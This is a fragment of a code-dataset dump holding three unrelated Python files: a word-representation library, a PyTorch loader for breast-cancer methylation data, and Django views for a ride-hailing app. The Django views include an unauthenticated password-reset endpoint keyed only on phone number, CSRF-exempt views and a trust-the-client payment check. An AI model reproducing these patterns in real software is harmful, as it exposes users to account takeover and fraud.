took \"+str(t)+\" seconds.\\n\")\r\n self.n_words = self.library.shape[0]\r\n self.ci_roots = None\r\n self.ci_vocab = None\r\n\r\n # Get a specific word representation by integer count index\r\n def get_wrep_by_int(self, i):\r\n return list(self.library.iloc[i])\r\n\r\n # Get a specific word representation\r\n def get_wrep(self, word):\r\n return list(self.library.loc[word])\r\n\r\n # Get a specific word representation and it's index\r\n def get_wrepi(self, w, ignore_case_if_missing=True):\r\n if ignore_case_if_missing and w not in self.library.index:\r\n w = self.autocorrect_word(w)\r\n return self.library.index.get_loc(w), self.get_wrep(w)\r\n\r\n # Autocorrect a word to match a word in this library\r\n def autocorrect_word(self, word):\r\n self._build_autocorrect_index()\r\n return self.ci_roots[word_root(word)]\r\n\r\n def _build_autocorrect_index(self):\r\n if self.ci_roots is None:\r\n print(\"Constructing capitalisation autocorrection index...\")\r\n roots = {}\r\n for w in self.library.index:\r\n r = word_root(w)\r\n if r not in roots: roots[r] = []\r\n roots[r].append(w)\r\n self.ci_roots = {w: sorted(roots[w])[-1] for w in roots}\r\n print(\"Completed.\")\r\n\r\n # Adjust capitalisation autocorrection index to use 1gram count modes (+++)\r\n def import_autocorrect_1grams(self, ngrams_db):\r\n print(\"Importing 1gram capitalisation autocorrection index...\")\r\n self._build_autocorrect_index()\r\n ngrams_db_roots = dict(list(zip(list(map(word_root,\r\n ngrams_db.index.values)), ngrams_db.index.values)))\r\n for r in self.ci_roots:\r\n if r in ngrams_db_roots:\r\n w = ngrams_db_roots[r]\r\n if w in self.library.index:\r\n self.ci_roots[r] = w\r\n print(\"Completed 1grams import.\")\r\n\r\n # Get a specific word representation and it's index if it exists\r\n def get_wrepi_if_exists(self, word):\r\n return self.get_wrepi(word) if word in self.library.index else None\r\n\r\n # Check if a word exists in the library\r\n def get_exists(self, word):\r\n return word in self.library.index\r\n\r\n # Same but ignoring case (assumes input word is all lowercase)\r\n def get_exists_ci(self, word):\r\n if self.ci_vocab is None:\r\n print(\"Case-insensitive vocabulary for representation library...\")\r\n self.ci_vocab = set([w.lower() for w in self.library.index])\r\n print(\"Completed\")\r\n return word in self.ci_vocab\r\n\r\n # Get a new, random unseen word from the library\r\n def get_new_word(self, i_seen=None, autocorrect_caps=True):\r\n\r\n # Get a random word (index) to add (that we haven't added yet)\r\n word_i = None\r\n if i_seen is None:\r\n word_i = np.random.randint(0, self.n_words)\r\n else:\r\n i_rem = [i for i in range(self.n_words) if i not in i_seen]\r\n word_i = i_rem[np.random.randint(0, len(i_rem))]\r\n\r\n word = self.library.index[word_i]\r\n if autocorrect_caps:\r\n word = self.autocorrect_word(word)\r\n return (word,) + self.get_wrepi(word)\r\n\r\n return word, word_i, self.get_wrep_by_int(word_i)\r\n\r\n\r\n","repo_name":"jigawhat/languart","sub_path":"WordRepLibrary.py","file_name":"WordRepLibrary.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33972907479","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch import Tensor\nfrom itertools import chain\n\nclass CancerDatasetWrapper:\n\tclass __CancerDatasetWrapper:\n\t\t\"\"\"\n\t\tA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\t\t\"\"\"\n\t\tdef __init__(self, cv_iters):\n\t\t\t\"\"\"\n\t\t\tcreate df for features and labels\n\t\t\tremove samples that are not shared between the two tables\n\t\t\t\"\"\"\n\n\t\t\tself.cv_iters = cv_iters\n\t\t\tself.labels = pd.read_csv(\"TCGA-BRCA.survival.tsv\",delimiter='\\t',encoding='utf-8') \n\t\t\t#filter LumA donors\n\t\t\tdonor = pd.read_csv(\"TCGA_PAM50.txt\",delimiter='\\t',encoding='utf-8') \n\t\t\tdonor = donor[donor['PAM50_genefu'] == 'LumA']\n\t\t\tdonor = donor['submitted_donor_id']\n\n\t\t\tself.labels = self.labels[self.labels['_PATIENT'].isin(donor)]\n\t\t\tlabel_sample_list = list(self.labels['sample'])\n\n\t\t\tself.features = pd.read_csv(\"TCGA-BRCA.methylation450.tsv\",delimiter='\\t',encoding='utf-8') \n\t\t\tself.features = self.features.dropna().reset_index(drop=True)\n\t\t\tself.features = self.features.drop([list(self.features.columns.values)[0]], axis=1)\n\n\t\t\tfeature_sample_list = list(self.features.columns.values)\n\t\t\tsamples = list(set(label_sample_list) & set(feature_sample_list))\n\t\t\t\n\t\t\t#only keep LumA samples to limit the memory usage\n\t\t\tself.features = self.features[samples]\n\t\t\tself.labels = self.labels[self.labels['sample'].isin(samples)]\n\n\t\t\tself.shuffle()\n\n\t\tdef label(self, key):\n\t\t\t\"\"\"\n\t\t\tArgs: \n\t\t\t\tkey:(string) the sample key\t\n\t\t\tReturns:\n\t\t\t\tlabel to the life and death of patient\n\t\t\t\"\"\"\n\t\t\treturn self.labels[self.labels['sample'] == key]['OS']\n\n\t\tdef shuffle(self):\n\t\t\t\"\"\"\n\t\t\tcategorize sample ID by label\n\t\t\t\"\"\"\n\t\t\t#keys to feature where label is 1\n\t\t\tself.ones = list(self.labels[self.labels['OS']==1]['sample'])\n\t\t\tindex = np.arange(len(self.ones))\n\t\t\tnp.random.shuffle(index)\n\t\t\tself.ones = [self.ones[index[i]] for i in range(index.shape[0])]\n\t\t\tself.ones = [self.ones[int(len(self.ones)/self.cv_iters)*i: int(len(self.ones)/self.cv_iters)*(i+1)] for i in range(self.cv_iters)]\n\n\t\t\t#keys to feature where label is 0\n\t\t\tself.zeros = list(self.labels[self.labels['OS']==0]['sample'])\n\t\t\tindex = np.arange(len(self.zeros))\n\t\t\tnp.random.shuffle(np.arange(len(self.zeros)))\n\t\t\tself.zeros = [self.zeros[index[i]] for i in range(index.shape[0])]\n\t\t\tself.zeros = [self.zeros[int(len(self.zeros)/self.cv_iters)*i: int(len(self.zeros)/self.cv_iters)*(i+1)] for i in range(self.cv_iters)]\n\n\t\t\t#index of valication set\n\t\t\tself.CVindex = 0\n\n\t\tdef next(self):\n\t\t\t'''\n\t\t\trotate to the next cross validation process\n\t\t\t'''\n\t\t\tif self.CVindex < self.cv_iters-1:\n\t\t\t\tself.CVindex += 1\n\t\t\telse:\n\t\t\t\tself.CVindex = 0\n\n\n\tinstance = None\n\tdef __init__(self, cv_iters, shuffle = 0):\n\t\tif not CancerDatasetWrapper.instance:\n\t\t\tCancerDatasetWrapper.instance = CancerDatasetWrapper.__CancerDatasetWrapper(cv_iters)\n\n\t\tif shuffle:\n\t\t\tCancerDatasetWrapper.instance.shuffle()\n\n\tdef __getattr__(self, name):\n\t\treturn getattr(self.instance, name)\n\n\tdef features(self, key):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tkey:(string) value from dataset\t\n\t\tReturns:\n\t\t\tfeatures in list\t\n\t\t\"\"\"\n\t\treturn np.array(list(CancerDatasetWrapper.instance.features[key]))\n\n\tdef label(self, key):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tkey:(string) the sample key/id\t\n\t\tReturns:\n\t\t\tlabel to the life and death of patient\n\t\t\"\"\"\n\t\treturn np.array(list(CancerDatasetWrapper.instance.label(key)))\n\n\tdef next(self):\n\t\tCancerDatasetWrapper.instance.next()\n\n\tdef shuffle(self):\n\t\tCancerDatasetWrapper.instance.shuffle()\n\n\tdef __trainSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of trainning set\n\t\t\"\"\"\n\n\t\tind = list(range(CancerDatasetWrapper.instance.cv_iters))\n\t\tind = np.delete(ind, CancerDatasetWrapper.instance.CVindex)\n\n\t\ttrainSet = list(chain(*[CancerDatasetWrapper.instance.zeros[i] for i in ind]))+list(chain(*[CancerDatasetWrapper.instance.ones[i] for i in ind]))\n\n\t\treturn trainSet\n\t\n\tdef __valSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of validation set\n\t\t\"\"\"\n\n\t\tvalSet = CancerDatasetWrapper.instance.zeros[CancerDatasetWrapper.instance.CVindex] + CancerDatasetWrapper.instance.ones[CancerDatasetWrapper.instance.CVindex]\n\n\t\treturn valSet\n\n\tdef __fullSet(self):\n\t\t\"\"\"\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of full dataset\n\t\t\"\"\"\n\n\t\tfullset = list(chain(*CancerDatasetWrapper.instance.zeros))+list(chain(*CancerDatasetWrapper.instance.ones))\n\n\t\treturn fullset\n\n\tdef getDataSet(self, dataSetType = 'train'):\n\t\t\"\"\"\n\t\tArgs: \n\t\t\tdataSetType: (string) 'train' or 'val'\t\n\t\tReturns:\n\t\t\tdataset: (np.ndarray) array of key/id of data set\n\t\t\"\"\"\n\n\t\tif dataSetType == 'train':\n\t\t\treturn self.__trainSet()\n\n\t\tif dataSetType == 'val':\n\t\t\treturn self.__valSet()\n\n\t\treturn self.__fullSet()\n\t\t\n\n\nclass CancerDataset(Dataset):\n\t\"\"\"\n\tA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\t\"\"\"\n\tdef __init__(self, dataSetType, CV_iters):\n\t\t\"\"\"\n\t\tinitialize DatasetWrapper\n\t\t\"\"\"\n\t\tself.DatasetWrapper = CancerDatasetWrapper(CV_iters)\n\n\t\tself.samples = self.DatasetWrapper.getDataSet(dataSetType)\n\n\tdef __len__(self):\n\t\t# return size of dataset\n\t\treturn len(self.samples)\n\n\n\tdef __getitem__(self, idx):\n\t\t\"\"\"\n\t\tFetch feature and labels from dataset using index of the sample.\n\n\t\tArgs:\n\t\t idx: (int) index of the sample\n\n\t\tReturns:\n\t\t feature: (Tensor) feature\n\t\t label: (int) corresponding label of sample\n\t\t\"\"\"\n\t\tsample = self.samples[idx]\n\t\treturn Tensor(self.DatasetWrapper.features(sample)), self.DatasetWrapper.label(sample)\n\n\ndef fetch_dataloader(types, params):\n\t\"\"\"\n\tFetches the DataLoader object for each type in types.\n\n\tArgs:\n\ttypes: (list) has one or more of 'train', 'val'depending on which data is required '' to get the full dataSet\n\tparams: (Params) hyperparameters\n\n\tReturns:\n\tdata: (dict) contains the DataLoader object for each type in types\n\t\"\"\"\n\tdataloaders = {}\n\t\n\tif len(types)>0:\n\t\tfor split in types:\n\t\t\tif split in ['train', 'val']:\n\t\t\t\tdl = DataLoader(CancerDataset(split, params.CV_iters), batch_size=params.batch_size, shuffle=True,\n\t\t\t\t\tnum_workers=params.num_workers,\n\t\t\t\t\tpin_memory=params.cuda)\n\n\t\t\t\tdataloaders[split] = dl\n\telse:\n\t\tdl = DataLoader(CancerDataset('',params.CV_iters), batch_size=params.batch_size, shuffle=True,\n\t\t\tnum_workers=params.num_workers,\n\t\t\tpin_memory=params.cuda)\n\n\t\treturn dl\n\n\treturn dataloaders\n\ndef get_next_CV_set(CV_iters):\n\tDatasetWrapper = CancerDatasetWrapper(CV_iters)\n\tDatasetWrapper.next()\n","repo_name":"Bozhao-Liu/LumACat_test","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38827652770","text":"from django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom random import randint\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import CustomUserSerailizer, LoginSerializer, DriverReviewSerializer, CustomDriverSerializer, CustomDriverLoginSerializer\nfrom .models import CustomUser, RideRequest, CustomDriver, Review, Admin, CustomDriverToken, AcceptedDriver\nfrom .authentication import CustomDriverBackend\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\nfrom decimal import Decimal\nfrom rest_framework.parsers import MultiPartParser\nfrom django.contrib.auth.password_validation import validate_password\nfrom django.core.exceptions import ValidationError\nimport random\nimport string\nimport threading\nfrom geopy import distance\n\n\nclass RegisterAndSendOTP(APIView):\n def post(self, request):\n User = get_user_model()\n email = request.data.get('email')\n if not email:\n return Response({'error': 'Please provide your email'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Check if email is already registered\n if User.objects.filter(email=email).exists():\n return Response({'error': 'Email already registered'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Generate OTP and save it to the user model\n otp = str(randint(100000, 999999))\n user = User(email=email, otp=otp)\n user.otp = otp\n user.save()\n\n # Send OTP to the user's email\n send_mail(\n 'OTP Verification',\n f'Your OTP is {otp}',\n settings.EMAIL_HOST_USER,\n [email],\n fail_silently=False,\n )\n\n return Response({'success': 'OTP has been sent to your email address.', 'email': email}, status=status.HTTP_200_OK)\n\nclass VerifyOTPAPIView(APIView):\n def post(self, request):\n User = get_user_model()\n email = request.data.get('email')\n otp = request.data.get('otp')\n if not email or not otp:\n return Response({'error': 'Please provide your email and OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n user = get_object_or_404(User, email=email)\n if user.otp != otp:\n return Response({'error': 'Invalid OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n user.otp = ''\n user.save()\n\n return Response({'success': 'OTP has been verified', 'email': email}, status=status.HTTP_200_OK)\n\nclass SignupView(APIView):\n def post(self, request):\n full_name = request.data.get('full_name')\n city = request.data.get('city')\n password = request.data.get('password')\n phone_number = request.data.get('phone_number')\n\n # Retrieve phone number from request data\n email = request.data.get('email')\n\n # Check if user already exists with the provided phone number\n try:\n user = CustomUser.objects.get(email=email)\n # If full_name is not provided, return error response\n if not full_name:\n return Response({\"message\": \"User already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n # If full_name is provided, update user data and save to database\n user.full_name = full_name\n user.city = city\n user.phone_number = phone_number\n user.set_password(password)\n user.save()\n # Serialize and return updated user data\n return Response({\"message\": \"SIgnup successful\", \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n except CustomUser.DoesNotExist:\n pass\n\n # Create new user object and save to database\n user = CustomUser(full_name=full_name, city=city, email=email)\n user.set_password(password)\n user.save()\n\n # Serialize and return user data\n serializer = CustomUserSerializer(user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass LoginView(ObtainAuthToken):\n serializer_class = LoginSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n return Response({'token': token.key})\n\nclass UpdatePasswordView(APIView):\n def put(self, request):\n phone_number = request.data.get('phone_number')\n password = request.data.get('password')\n\n # Check if user exists\n try:\n user = get_user_model().objects.get(phone_number=phone_number)\n except get_user_model().DoesNotExist:\n return Response({\"message\": \"User does not exist.\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # Update password\n user.set_password(password)\n user.save()\n\n return Response({\"message\": \"Password updated successfully.\"}, status=status.HTTP_200_OK)\n\n\nclass SelectLocationView(APIView):\n def post(self, request):\n token_value = request.data.get('token')\n if token_value is None:\n return Response({'error': 'Token not provided'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n token = Token.objects.get(key=token_value)\n user = CustomUser.objects.get(id=token.user_id)\n except Token.DoesNotExist:\n return Response({'error': 'Invalid token'}, status=status.HTTP_400_BAD_REQUEST)\n except CustomUser.DoesNotExist:\n return Response({'error': 'User not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n current_location = request.data.get('current_location', None)\n current_coordinates = request.data.get('current_coordinates', None)\n destination_location = request.data.get('destination_location', None)\n destination_coordinates = request.data.get('destination_coordinates', None)\n\n if current_location is None or destination_location is None or current_coordinates is None or destination_coordinates is None:\n return Response({'error': 'current_location and destination_location are required fields.'},\n status=status.HTTP_400_BAD_REQUEST)\n\n user.current_location = current_location\n user.current_coordinates = current_coordinates\n user.destination_location = destination_location\n user.destination_coordinates = destination_coordinates\n user.save()\n\n return Response({'success': 'Locations saved successfully.', 'token': token_value, 'current_location': current_location, 'destination_location': destination_location, 'current_coordinates': current_coordinates, 'destination_coordinates': destination_coordinates}, status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef ride_request_view(request):\n # get current user based on token\n token_value = request.data.get('token')\n if token_value is None:\n return JsonResponse({'error': 'Token not provided'}, status=400)\n\n try:\n token = Token.objects.get(key=token_value)\n User = get_user_model()\n user = User.objects.get(id=token.user_id)\n except Token.DoesNotExist:\n return JsonResponse({'error': 'Invalid token'}, status=400)\n except User.DoesNotExist:\n return JsonResponse({'error': 'User not found'}, status=400)\n\n # get ride details from request data\n ride_type = request.data.get('ride_type')\n entire_cabin = request.data.get('entire_cabin')\n mini_cabin = request.data.get('mini_cabin')\n shared_cabin = request.data.get('shared_cabin')\n num_passengers = request.data.get('num_passengers')\n price = request.data.get('price')\n\n # generate a request_id\n request_id = ''.join(random.choices('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', k=10))\n\n # create and save ride request\n riderequest = RideRequest.objects.create(\n ride_type=ride_type,\n entire_cabin=entire_cabin,\n mini_cabin=mini_cabin,\n shared_cabin=shared_cabin,\n price=price,\n num_passengers=num_passengers,\n user=user,\n request_id=request_id\n )\n riderequest.save()\n\n return Response({'message': 'Ride request created successfully', 'request_id': request_id}, status=200)\n\n\n@api_view(['POST'])\ndef get_ride_details(request):\n request_id = request.data.get('request_id')\n radius = request.data.get('radius') or 10\n if request_id is None:\n return Response({'error': 'Request ID not provided'}, status=400)\n\n try:\n riderequest = RideRequest.objects.get(request_id=request_id)\n user = riderequest.user\n user_location = user.current_coordinates\n if user_location is None:\n return Response({'error': 'User location not available'}, status=400)\n\n drivers = CustomDriver.objects.filter(current_coordinates__isnull=False)\n nearby_drivers = []\n for driver in drivers:\n driver_location = driver.current_coordinates\n if driver_location:\n driver_coords = (driver_location.get('current_coordinates'))\n user_coords = (user_location.get('current_coordinates'))\n if distance.distance(driver_coords, user_coords).km <= radius:\n nearby_drivers.append(driver)\n\n ride_details = {\n 'ride_type': riderequest.ride_type,\n 'entire_cabin': riderequest.entire_cabin,\n 'mini_cabin': riderequest.mini_cabin,\n 'shared_cabin': riderequest.shared_cabin,\n 'price': riderequest.price,\n 'num_passengers': riderequest.num_passengers,\n }\n user_details = {\n 'full_name': riderequest.user.full_name,\n 'phone_number': riderequest.user.phone_number,\n 'current_location': riderequest.user.current_location,\n 'current_coordinates': riderequest.user.current_coordinates,\n 'destination_location': riderequest.user.destination_location,\n 'destination_coordinates': riderequest.user.destination_coordinates,\n }\n return Response({'ride_details': ride_details, 'user_details': user_details})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef create_driver(request):\n email = request.data.get('email')\n full_name = request.data.get('full_name')\n city = request.data.get('city')\n current_coordinates = request.data.get('current_coordinates')\n\n # check if all required fields are present\n if not email or not full_name or not city or not current_coordinates:\n return Response({'error': 'Please provide all required fields.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # create the CustomDriver object\n driver = CustomDriver(email=email, full_name=full_name, city=city, current_coordinates=current_coordinates)\n\n # save the object to the database\n driver.save()\n\n return Response({'success': 'CustomDriver object created successfully.'}, status=status.HTTP_201_CREATED)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef find_driver(request):\n User = CustomDriver\n # get request parameters\n request_id = request.data.get('request_id')\n radius = request.data.get('radius') or 10 # default radius is 10 km\n\n # get user request coordinates\n user = CustomUser.objects.get(riderequest__request_id=request_id)\n user_coords = (user.current_coordinates.get('current_coordinates'))\n\n # find drivers within radius\n drivers = User.objects.filter(\n is_active=True, # only active drivers\n current_coordinates__isnull=False # only drivers with current coordinates\n )\n\n # filter drivers within radius\n nearby_drivers = []\n for driver in drivers:\n if driver.current_coordinates:\n driver_coords = (driver.current_coordinates.get('current_coordinates'))\n if distance.distance(driver_coords, user_coords).km <= radius:\n nearby_drivers.append(driver)\n\n # create response data\n response_data = {\n 'nearby_drivers': [{'email': driver.email, 'full_name': driver.full_name, 'city': driver.city} for driver in nearby_drivers]\n }\n\n return JsonResponse(response_data)\n\n\n@api_view(['POST'])\ndef get_driver_details(request):\n request_id = request.data.get('request_id')\n\n if request_id is None:\n return Response({'error': 'Request ID not provided'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n accepted_drivers = AcceptedDriver.objects.filter(ride_request=ride_request)\n driver_details = []\n\n for accepted_driver in accepted_drivers:\n driver = accepted_driver.driver\n driver_info = {\n 'email': driver.email,\n 'full_name': driver.full_name,\n # Add more driver details as needed\n }\n driver_details.append(driver_info)\n\n response_data = {\n 'request_id': request_id,\n 'drivers': driver_details\n }\n\n return Response(response_data)\n\n@api_view(['POST'])\ndef accept_ride(request):\n request_id = request.data.get('request_id')\n driver_full_name = request.data.get('driver_full_name')\n ride_status = request.data.get('ride_status')\n\n if not request_id or not driver_full_name or ride_status is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n if ride_request.ride_status == 'Accepted': # Check if the ride request has already been accepted\n return Response({'error': 'Ride request has already been accepted'}, status=400)\n\n if ride_request.ride_status == 'Pending':\n driver = CustomDriver.objects.get(full_name=driver_full_name)\n ride_request.accepted_driver_id = driver.id\n ride_request.ride_status = 'Accepted'\n ride_request.save()\n # You can perform any additional actions here when the ride request is accepted\n\n # Retrieve the details of the accepted driver\n driver_details = {\n 'email': driver.email,\n 'full_name': driver.full_name,\n # Include any other driver details you want to return\n }\n\n return Response({'driver_details': driver_details, 'request_id': request_id})\n else:\n return Response({'error': 'Invalid ride status'}, status=400)\n\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=400)\n\n\nclass TimeAndCoordinatesUpdater:\n def __init__(self, ride_request):\n self.ride_request = ride_request\n\n def update(self):\n driver = self.ride_request.accepted_driver\n\n if not driver:\n return\n\n driver_coordinates = driver.current_coordinates\n user_coordinates = self.ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 60\n estimated_time = distance_km / average_speed\n\n self.ride_request.estimated_time = estimated_time\n self.ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, self.update).start()\n\n@api_view(['POST'])\ndef calculate_time(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n updater = TimeAndCoordinatesUpdater(ride_request)\n\n # Start the periodic update of time and coordinates\n updater.update()\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n driver_name = driver.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef calculate_time1(request):\n request_id = request.data.get('request_id')\n\n if not request_id:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.ride_status != 'Accepted':\n return Response({'error': 'Ride request has not been accepted'}, status=400)\n\n driver = ride_request.accepted_driver\n\n if not driver:\n return Response({'error': 'Accepted driver not found'}, status=400)\n\n def update_time_and_coordinates():\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n if not driver_coordinates or not user_coordinates:\n return\n\n driver_coords = (driver_coordinates.get('current_lat'), driver_coordinates.get('current_long'))\n user_coords = (user_coordinates.get('current_lat'), user_coordinates.get('current_long'))\n distance_km = distance.distance(driver_coords, user_coords).km\n\n average_speed = 30 # Modify the average speed value based on the driver's expected speed\n\n estimated_time = (distance_km / average_speed) * 60\n estimated_time = round(estimated_time, 2)\n\n ride_request.estimated_time = estimated_time\n ride_request.save()\n\n # Schedule the next update after 30 seconds\n threading.Timer(30, update_time_and_coordinates).start()\n\n # Start the periodic update of time and coordinates\n update_time_and_coordinates()\n\n driver_name = driver.full_name\n user_name = ride_request.user.full_name\n driver_coordinates = driver.current_coordinates\n user_coordinates = ride_request.user.current_coordinates\n\n return Response({'user_name': user_name, 'driver_name': driver_name, 'estimated_time': ride_request.estimated_time, 'driver_coordinates': driver_coordinates, 'user_coordinates': user_coordinates})\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\n@api_view(['POST'])\ndef write_review(request):\n driver_full_name = request.data.get('driver_full_name')\n user_full_name = request.data.get('user_full_name')\n note = request.data.get('note')\n rating = request.data.get('rating')\n\n if not driver_full_name or not user_full_name or not note or rating is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(full_name=driver_full_name)\n user = CustomUser.objects.get(full_name=user_full_name)\n\n review, created = Review.objects.get_or_create(driver=driver, user=user)\n if not created:\n return Response({'error': 'Review already exists for this driver'}, status=400)\n\n review.note = note\n review.rating = rating\n review.save()\n\n return Response({'success': 'Review saved successfully'})\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=400)\n except CustomUser.DoesNotExist:\n return Response({'error': 'User not found'}, status=400)\n\n\n@api_view(['GET'])\ndef driver_reviews(request):\n driver_name = request.data.get('driver_name')\n\n if not driver_name:\n return Response({'error': 'Driver name parameter is required'}, status=400)\n\n try:\n driver = CustomDriver.objects.get(full_name=driver_name)\n serializer = DriverReviewSerializer(driver)\n return Response(serializer.data)\n except CustomDriver.DoesNotExist:\n return Response({'error': 'Driver not found'}, status=404)\n\n\n@api_view(['POST'])\ndef verify_payment(request):\n request_id = request.data.get('request_id')\n payment = request.data.get('payment')\n\n if not request_id or not payment:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n try:\n ride_request = RideRequest.objects.get(request_id=request_id)\n\n if ride_request.price == Decimal(payment):\n return Response({'message': 'Payment done', 'request_id': ride_request.request_id})\n else:\n # Payment verification failed\n return Response({'error': 'Payment verification failed'}, status=400)\n\n except RideRequest.DoesNotExist:\n return Response({'error': 'Invalid Request ID'}, status=400)\n\n\nclass DriverRegisterAndSendOTP(APIView):\n def post(self, request):\n email = request.data.get('email')\n if not email:\n return Response({'error': 'Please provide your email'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Check if email is already registered\n if CustomDriver.objects.filter(email=email).exists():\n return Response({'error': 'Email already registered'}, status=status.HTTP_400_BAD_REQUEST)\n\n # Generate OTP and save it to the driver model\n otp = str(randint(1000, 9999))\n driver = CustomDriver(email=email, otp=otp)\n driver.save()\n\n # Send OTP to the driver's email\n send_mail(\n 'OTP Verification',\n f'Your Driver verification OTP is {otp}',\n settings.EMAIL_HOST_USER,\n [email],\n fail_silently=False,\n )\n\n return Response({'success': 'OTP has been sent to your email address.', 'email': email}, status=status.HTTP_200_OK)\n\n\nclass DriverVerifyOTPAPIView(APIView):\n def post(self, request):\n email = request.data.get('email')\n otp = request.data.get('otp')\n if not email or not otp:\n return Response({'error': 'Please provide your email and OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n driver = get_object_or_404(CustomDriver, email=email)\n if driver.otp != otp:\n return Response({'error': 'Invalid OTP'}, status=status.HTTP_400_BAD_REQUEST)\n\n driver.otp = ''\n driver.save()\n\n return Response({'success': 'OTP has been verified', 'email': email}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView1(APIView):\n def post(self, request):\n full_name = request.data.get('full_name')\n gender = request.data.get('gender')\n state = request.data.get('state')\n city = request.data.get('city')\n residential_address = request.data.get('residential_address')\n phone_number = request.data.get('phone_number')\n email = request.data.get('email')\n\n try:\n driver = CustomDriver.objects.get(email=email)\n if not full_name:\n return Response({\"message\": \"Driver already exists.\"}, status=status.HTTP_400_BAD_REQUEST)\n driver.full_name = full_name\n driver.gender = gender\n driver.state = state\n driver.city = city\n driver.residential_address = residential_address\n driver.phone_number = phone_number\n driver.save()\n return Response({\"message\": \"Signup successful\", \"email\": email, \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n except CustomDriver.DoesNotExist:\n pass\n\n driver = CustomDriver(full_name=full_name, gender=gender, state=state, city=city, residential_address=residential_address, phone_number=phone_number, email=email)\n driver.save()\n\n return Response({\"message\": \"Signup successful\", \"email\": email, \"full_name\": full_name, \"city\": city}, status=status.HTTP_200_OK)\n\n\nclass driverSignupView2(APIView):\n parser_classes = [MultiPartParser]\n\n def post(self, request):\n vehicle_image = request.FILES.get('vehicle_image')\n model_name = request.data.get('model_name')\n model_number = request.data.get('model_number')\n vehicle_year = request.data.get('vehicle_year')\n license_plate = request.data.get('license_plate')\n vehicle_description = request.data.get('vehicle_description')\n\n if not vehicle_image or not model_name or not model_number or not vehicle_year or not license_plate or vehicle_description is None:\n return Response({'error': 'Incomplete parameters'}, status=400)\n\n # Retrieve email from request data\n email = request.data.get('email')\n\n # Check if driver already exists with the provided email\n try:\n driver = CustomDriver.objects.get(email=email)\n except 